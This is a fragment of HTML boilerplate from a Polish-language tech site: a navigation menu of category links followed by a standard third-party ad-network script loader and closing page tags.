href="https://storerarity.ru/pl/category/devices/">Urządzenia</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/browsers/">Przeglądarki</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/reviews/">Opinie</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/reviews/">Opinie</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/setup/">Ustawienia</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/torrent/">Potok</a></li> </ul> </div> </div> </nav> <script type="text/javascript"> <!-- var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script><br> <br> </body> </html>